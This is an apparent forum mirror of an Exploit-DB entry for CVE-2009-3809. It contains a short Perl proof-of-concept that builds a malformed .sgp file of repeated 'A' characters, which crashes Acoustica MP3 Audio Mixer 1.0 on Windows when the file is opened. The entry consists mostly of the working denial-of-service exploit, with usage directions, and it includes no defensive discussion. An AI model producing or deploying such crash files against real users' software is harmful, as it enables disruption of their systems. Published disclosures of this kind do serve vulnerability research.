- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9212
- Проверка EDB
-
- Пройдено
- Автор
- PRODIGY
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2009-3809
- Дата публикации
- 2009-07-20
Код:
#!/usr/bin/perl -w
#
# Acoustica MP3 Audio Mixer 1.0 (.sgp file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: www.acoustica.com
#
# Usage to reproduce the bug: when you created the malicious file, open it from the menu of the program and booom!!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.sgp";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfully\n";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# milw0rm.com [2009-07-20]
- Источник
- www.exploit-db.com